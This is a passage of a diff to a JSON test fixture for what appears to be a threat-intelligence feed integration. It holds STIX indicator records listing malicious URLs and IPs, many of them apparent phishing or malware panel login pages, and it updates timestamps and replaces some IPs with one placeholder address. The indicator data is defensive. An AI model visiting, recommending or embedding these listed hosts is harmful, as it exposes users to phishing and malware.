CyberCrime\",\"id\":\"indicator--14393248-efcc-4446-9c71-c24b8ea653ab\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-70\"],\"modified\":\"2020-02-10T02:04:24.419Z\",\"name\":\"mal_url: http://f0396384.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0396384.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-10T02:04:24.419Z\"}", "category": "threat", "type": "indicator", @@ -21412,7 +21412,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388039039Z", + "ingested": "2021-12-13T08:38:40.025244500Z", "original": "{\"created\":\"2020-02-10T02:04:39.273Z\",\"description\":\"TS ID: 55303483883; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--5139b761-30aa-48b8-a7f6-4d125117fd4d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-72\"],\"modified\":\"2020-02-10T02:04:39.273Z\",\"name\":\"mal_url: http://f0391247.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0391247.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-10T02:04:39.273Z\"}", "category": "threat", "type": "indicator", @@ -21464,7 +21464,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388043467Z", + "ingested": "2021-12-13T08:38:40.025251600Z", "original": "{\"created\":\"2020-02-11T02:05:59.738Z\",\"description\":\"TS ID: 55306531291; iType: mal_url; State: active; Org: Shinjiru Technology Sdn Bhd; Source: CyberCrime\",\"id\":\"indicator--8aed750b-7bc5-41be-956d-5c27ba956957\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-11T02:05:59.738Z\",\"name\":\"mal_url: http://borrdrillling.com/benz-forlife/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://borrdrillling.com/benz-forlife/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-11T02:05:59.738Z\"}", "category": "threat", "type": "indicator", @@ -21515,7 +21515,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388047766Z", + "ingested": "2021-12-13T08:38:40.025258800Z", "original": "{\"created\":\"2020-02-11T02:06:33.437Z\",\"description\":\"TS ID: 55306531295; iType: mal_url; State: active; Org: Shinjiru Technology Sdn Bhd; Source: CyberCrime\",\"id\":\"indicator--939b7b32-9004-40e0-8c48-77b9452a0902\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-11T02:06:33.437Z\",\"name\":\"mal_url: http://borrdrillling.com/fox/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://borrdrillling.com/fox/']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-11T02:06:33.437Z\"}", "category": "threat", "type": "indicator", @@ -21567,7 +21567,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388052224Z", + "ingested": "2021-12-13T08:38:40.025266100Z", "original": "{\"created\":\"2020-02-11T02:06:48.532Z\",\"description\":\"TS ID: 55306531290; iType: mal_url; State: active; Org: Shinjiru Technology Sdn Bhd; Source: CyberCrime\",\"id\":\"indicator--f2f9ebc5-814d-4ff2-9979-76264e15d743\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-11T02:06:48.532Z\",\"name\":\"mal_url: http://borrdrillling.com/benz/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://borrdrillling.com/benz/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-11T02:06:48.532Z\"}", "category": "threat", "type": "indicator", @@ -21619,7 +21619,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388056652Z", + "ingested": "2021-12-13T08:38:40.025273400Z", "original": "{\"created\":\"2020-02-11T02:07:49.317Z\",\"description\":\"TS ID: 55306531320; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--782c926c-e92f-451e-8aaf-dbe446b8abe4\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-76\"],\"modified\":\"2020-02-11T02:07:49.317Z\",\"name\":\"mal_url: http://klickus.com/okye/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://klickus.com/okye/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-11T02:07:49.317Z\"}", "category": "threat", "type": "indicator", @@ -21671,7 +21671,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388060790Z", + "ingested": "2021-12-13T08:38:40.025280600Z", "original": "{\"created\":\"2020-02-11T02:07:49.341Z\",\"description\":\"TS ID: 55306531298; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--336d437c-cb0b-473c-b157-3edad63d3a65\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-76\"],\"modified\":\"2020-02-11T02:07:49.341Z\",\"name\":\"mal_url: http://klickus.com/gozie/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://klickus.com/gozie/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-11T02:07:49.341Z\"}", "category": "threat", "type": "indicator", @@ -21723,7 +21723,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388065539Z", + "ingested": "2021-12-13T08:38:40.025286400Z", "original": "{\"created\":\"2020-02-12T02:02:34.926Z\",\"description\":\"TS ID: 55309106417; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--1fff5727-69fd-4477-a610-3542e53642ae\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-12T02:02:34.926Z\",\"name\":\"mal_url: http://alwaysdelivery.xyz/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://alwaysdelivery.xyz/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-12T02:02:34.926Z\"}", "category": "threat", "type": "indicator", @@ -21742,7 +21742,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://188.227.85.53/panel/admin.php", + "name": "mal_url: http://89.160.20.156/panel/admin.php", "description": "TS ID: 55309106235; iType: mal_url; State: active; Org: VoenTelecom nets; Source: CyberCrime", "modified": "2020-02-12T02:03:19.477Z", "valid_from": "2020-02-12T02:03:19.477Z", @@ -21767,16 +21767,16 @@ "url": { "path": "/panel/admin.php", "extension": "php", - "original": "http://188.227.85.53/panel/admin.php", + "original": "http://89.160.20.156/panel/admin.php", "scheme": "http", - "domain": "188.227.85.53", - "full": "http://188.227.85.53/panel/admin.php" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/panel/admin.php" } } }, "event": { - "ingested": "2021-12-13T05:57:34.388069987Z", - "original": "{\"created\":\"2020-02-12T02:03:19.477Z\",\"description\":\"TS ID: 55309106235; iType: mal_url; State: active; Org: VoenTelecom nets; Source: CyberCrime\",\"id\":\"indicator--8c3385b7-6ee5-4699-87c8-7a7b1da9b6aa\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-49\"],\"modified\":\"2020-02-12T02:03:19.477Z\",\"name\":\"mal_url: http://188.227.85.53/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://188.227.85.53/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-12T02:03:19.477Z\"}", + "ingested": "2021-12-13T08:38:40.025293700Z", + "original": "{\"created\":\"2020-02-12T02:03:19.477Z\",\"description\":\"TS ID: 55309106235; iType: mal_url; State: active; Org: VoenTelecom nets; Source: CyberCrime\",\"id\":\"indicator--8c3385b7-6ee5-4699-87c8-7a7b1da9b6aa\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-49\"],\"modified\":\"2020-02-12T02:03:19.477Z\",\"name\":\"mal_url: http://89.160.20.156/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-12T02:03:19.477Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -21794,7 +21794,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 111.90.142.42", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55311776075; iType: mal_ip; State: active; Org: Shinjiru Technology Sdn Bhd; Source: CyberCrime", "modified": "2020-02-13T02:02:41.467Z", "valid_from": "2020-02-13T02:02:41.467Z", @@ -21816,12 +21816,12 @@ "first_seen": "2020-02-13T02:02:41.467Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "111.90.142.42" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.388074315Z", - "original": "{\"created\":\"2020-02-13T02:02:41.467Z\",\"description\":\"TS ID: 55311776075; iType: mal_ip; State: active; Org: Shinjiru Technology Sdn Bhd; Source: CyberCrime\",\"id\":\"indicator--91ef9dde-3f0a-472c-b8ec-a1b9951acb50\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-02-13T02:02:41.467Z\",\"name\":\"mal_ip: 111.90.142.42\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '111.90.142.42']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-13T02:02:41.467Z\"}", + "ingested": "2021-12-13T08:38:40.025301Z", + "original": "{\"created\":\"2020-02-13T02:02:41.467Z\",\"description\":\"TS ID: 55311776075; iType: mal_ip; State: active; Org: Shinjiru Technology Sdn Bhd; Source: CyberCrime\",\"id\":\"indicator--91ef9dde-3f0a-472c-b8ec-a1b9951acb50\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-02-13T02:02:41.467Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-13T02:02:41.467Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -21872,7 +21872,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388078573Z", + "ingested": "2021-12-13T08:38:40.025308200Z", "original": "{\"created\":\"2020-02-13T02:02:52.653Z\",\"description\":\"TS ID: 55311776233; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--948a3e06-3481-4873-94e7-8ab068284aba\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-13T02:02:52.653Z\",\"name\":\"mal_url: http://felicombo.club/Zebra/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://felicombo.club/Zebra/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-13T02:02:52.653Z\"}", "category": "threat", "type": "indicator", @@ -21924,7 +21924,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388082992Z", + "ingested": "2021-12-13T08:38:40.025312400Z", "original": "{\"created\":\"2020-02-13T02:03:16.624Z\",\"description\":\"TS ID: 55311776246; iType: mal_url; State: active; Org: Shinjiru Technology Sdn Bhd; Source: CyberCrime\",\"id\":\"indicator--3b3faeec-4f78-41f2-acd8-13090336f058\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-02-13T02:03:16.624Z\",\"name\":\"mal_url: http://pdocxoffice.com/Panel/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://pdocxoffice.com/Panel/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-13T02:03:16.624Z\"}", "category": "threat", "type": "indicator", @@ -21976,7 +21976,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388087180Z", + "ingested": "2021-12-13T08:38:40.025317700Z", "original": "{\"created\":\"2020-02-13T02:03:36.577Z\",\"description\":\"TS ID: 55311776248; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--ae6ff4c4-73c1-473a-90cb-99f135240243\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-52\"],\"modified\":\"2020-02-13T02:03:36.577Z\",\"name\":\"mal_url: http://megaeditores.com/fgv/PHP/index.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://megaeditores.com/fgv/PHP/index.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-13T02:03:36.577Z\"}", "category": "threat", "type": "indicator", @@ -21995,7 +21995,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://45.153.185.12/prUjRYcU2rqFpZqv/login.php", + "name": "mal_url: http://89.160.20.156/prUjRYcU2rqFpZqv/login.php", "description": "TS ID: 55311776237; iType: mal_url; State: active; Source: CyberCrime", "modified": "2020-02-13T02:03:38.860Z", "valid_from": "2020-02-13T02:03:38.86Z", @@ -22020,16 +22020,16 @@ "url": { "path": "/prUjRYcU2rqFpZqv/login.php", "extension": "php", - "original": "http://45.153.185.12/prUjRYcU2rqFpZqv/login.php", + "original": "http://89.160.20.156/prUjRYcU2rqFpZqv/login.php", "scheme": "http", - "domain": "45.153.185.12", - "full": "http://45.153.185.12/prUjRYcU2rqFpZqv/login.php" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/prUjRYcU2rqFpZqv/login.php" } } }, "event": { - "ingested": "2021-12-13T05:57:34.388091778Z", - "original": "{\"created\":\"2020-02-13T02:03:38.86Z\",\"description\":\"TS ID: 55311776237; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--104abde1-c4e9-45a2-85e1-525ea3bec752\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-23\"],\"modified\":\"2020-02-13T02:03:38.86Z\",\"name\":\"mal_url: http://45.153.185.12/prUjRYcU2rqFpZqv/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://45.153.185.12/prUjRYcU2rqFpZqv/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-13T02:03:38.86Z\"}", + "ingested": "2021-12-13T08:38:40.025323200Z", + "original": "{\"created\":\"2020-02-13T02:03:38.86Z\",\"description\":\"TS ID: 55311776237; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--104abde1-c4e9-45a2-85e1-525ea3bec752\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-23\"],\"modified\":\"2020-02-13T02:03:38.86Z\",\"name\":\"mal_url: http://89.160.20.156/prUjRYcU2rqFpZqv/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/prUjRYcU2rqFpZqv/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-13T02:03:38.86Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -22079,7 +22079,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388096277Z", + "ingested": "2021-12-13T08:38:40.025329300Z", "original": "{\"created\":\"2020-02-20T04:06:53.787Z\",\"description\":\"TS ID: 55316616622; iType: mal_url; State: active; Org: Alibaba.com Singapore E-Commerce Private Limited; Source: CyberCrime\",\"id\":\"indicator--57d0bd25-4211-4e2e-8a4e-31e38eeda90b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-20T04:06:53.787Z\",\"name\":\"mal_url: http://hotlips.top/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://hotlips.top/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:06:53.787Z\"}", "category": "threat", "type": "indicator", @@ -22130,7 +22130,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388100575Z", + "ingested": "2021-12-13T08:38:40.025333200Z", "original": "{\"created\":\"2020-02-20T04:08:45.548Z\",\"description\":\"TS ID: 55316617564; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime\",\"id\":\"indicator--d11be9c2-b408-42a4-a4ad-0ede3c1709f0\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-20T04:08:45.548Z\",\"name\":\"mal_url: http://aflamdirectory.com/wp-content/ip/login/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://aflamdirectory.com/wp-content/ip/login/']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:08:45.548Z\"}", "category": "threat", "type": "indicator", @@ -22182,7 +22182,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388104933Z", + "ingested": "2021-12-13T08:38:40.025338600Z", "original": "{\"created\":\"2020-02-20T04:08:45.601Z\",\"description\":\"TS ID: 55316617187; iType: mal_url; State: active; Org: Telenet Ltd.; Source: CyberCrime\",\"id\":\"indicator--ed5ed1a3-8090-4db3-92cb-3b7b733fa28e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-02-20T04:08:45.601Z\",\"name\":\"mal_url: http://ayoobtextlie.com/craks/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ayoobtextlie.com/craks/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:08:45.601Z\"}", "category": "threat", "type": "indicator", @@ -22201,7 +22201,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 5.188.9.33", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55316616322; iType: mal_ip; State: active; Org: Petersburg Internet Network ltd.; Source: CyberCrime", "modified": "2020-02-20T04:09:16.891Z", "valid_from": "2020-02-20T04:09:16.891Z", @@ -22223,12 +22223,12 @@ "first_seen": "2020-02-20T04:09:16.891Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "5.188.9.33" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.388109201Z", - "original": "{\"created\":\"2020-02-20T04:09:16.891Z\",\"description\":\"TS ID: 55316616322; iType: mal_ip; State: active; Org: Petersburg Internet Network ltd.; Source: CyberCrime\",\"id\":\"indicator--6c201663-b1e4-483e-821b-0fe74aecc497\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-02-20T04:09:16.891Z\",\"name\":\"mal_ip: 5.188.9.33\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '5.188.9.33']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:09:16.891Z\"}", + "ingested": "2021-12-13T08:38:40.025345900Z", + "original": "{\"created\":\"2020-02-20T04:09:16.891Z\",\"description\":\"TS ID: 55316616322; iType: mal_ip; State: active; Org: Petersburg Internet Network ltd.; Source: CyberCrime\",\"id\":\"indicator--6c201663-b1e4-483e-821b-0fe74aecc497\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-02-20T04:09:16.891Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:09:16.891Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -22279,7 +22279,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388113519Z", + "ingested": "2021-12-13T08:38:40.025350200Z", "original": "{\"created\":\"2020-02-20T04:11:00.455Z\",\"description\":\"TS ID: 55316616996; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--8203935f-fb3f-418c-945d-40fca5ef088d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-20T04:11:00.455Z\",\"name\":\"mal_url: http://mecharnise.ir/ca10/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://mecharnise.ir/ca10/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:11:00.455Z\"}", "category": "threat", "type": "indicator", @@ -22298,7 +22298,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://5.8.88.27/login", + "name": "mal_url: http://89.160.20.156/login", "description": "TS ID: 55321824436; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime", "modified": "2020-02-20T04:28:36.154Z", "valid_from": "2020-02-20T04:28:36.154Z", @@ -22322,16 +22322,16 @@ "provider": "CyberCrime", "url": { "path": "/login", - "original": "http://5.8.88.27/login", + "original": "http://89.160.20.156/login", "scheme": "http", - "domain": "5.8.88.27", - "full": "http://5.8.88.27/login" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/login" } } }, "event": { - "ingested": "2021-12-13T05:57:34.388118639Z", - "original": "{\"created\":\"2020-02-20T04:28:36.154Z\",\"description\":\"TS ID: 55321824436; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--238f73e8-938d-4d08-9705-b1b669c129b2\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-77\"],\"modified\":\"2020-02-20T04:28:36.154Z\",\"name\":\"mal_url: http://5.8.88.27/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://5.8.88.27/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:28:36.154Z\"}", + "ingested": "2021-12-13T08:38:40.025354800Z", + "original": "{\"created\":\"2020-02-20T04:28:36.154Z\",\"description\":\"TS ID: 55321824436; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--238f73e8-938d-4d08-9705-b1b669c129b2\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-77\"],\"modified\":\"2020-02-20T04:28:36.154Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:28:36.154Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -22382,7 +22382,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388123478Z", + "ingested": "2021-12-13T08:38:40.025358300Z", "original": "{\"created\":\"2020-02-20T04:28:36.172Z\",\"description\":\"TS ID: 55321824399; iType: mal_url; State: active; Org: Global Frag Networks; Source: CyberCrime\",\"id\":\"indicator--6ff21635-ac08-4afe-b5e7-c18dfe320f0f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-70\"],\"modified\":\"2020-02-20T04:28:36.172Z\",\"name\":\"mal_url: http://23.247.102.18/4/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://23.247.102.18/4/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:28:36.172Z\"}", "category": "threat", "type": "indicator", @@ -22434,7 +22434,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388127966Z", + "ingested": "2021-12-13T08:38:40.025363400Z", "original": "{\"created\":\"2020-02-20T04:28:36.19Z\",\"description\":\"TS ID: 55321824397; iType: mal_url; State: active; Org: Global Frag Networks; Source: CyberCrime\",\"id\":\"indicator--9f55ff73-b6b6-476d-bb32-b9a7f8b16e93\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-70\"],\"modified\":\"2020-02-20T04:28:36.19Z\",\"name\":\"mal_url: http://23.247.102.18/6/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://23.247.102.18/6/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:28:36.19Z\"}", "category": "threat", "type": "indicator", @@ -22485,7 +22485,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388132565Z", + "ingested": "2021-12-13T08:38:40.025369500Z", "original": "{\"created\":\"2020-02-20T04:30:25.248Z\",\"description\":\"TS ID: 55321824409; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--4abbf2ea-6e46-48e8-b74d-1928c92e6277\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-71\"],\"modified\":\"2020-02-20T04:30:25.248Z\",\"name\":\"mal_url: http://f0400035.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0400035.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:30:25.248Z\"}", "category": "threat", "type": "indicator", @@ -22504,7 +22504,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 217.8.117.22", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55321824418; iType: mal_ip; State: active; Source: CyberCrime", "modified": "2020-02-20T04:31:26.488Z", "valid_from": "2020-02-20T04:31:26.488Z", @@ -22526,12 +22526,12 @@ "first_seen": "2020-02-20T04:31:26.488Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "217.8.117.22" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.388136823Z", - "original": "{\"created\":\"2020-02-20T04:31:26.488Z\",\"description\":\"TS ID: 55321824418; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--8678d0a4-2b3c-4cea-a745-796f996e18bc\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-20T04:31:26.488Z\",\"name\":\"mal_ip: 217.8.117.22\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '217.8.117.22']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:31:26.488Z\"}", + "ingested": "2021-12-13T08:38:40.025375900Z", + "original": "{\"created\":\"2020-02-20T04:31:26.488Z\",\"description\":\"TS ID: 55321824418; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--8678d0a4-2b3c-4cea-a745-796f996e18bc\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-20T04:31:26.488Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:31:26.488Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -22582,7 +22582,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388141291Z", + "ingested": "2021-12-13T08:38:40.025383100Z", "original": 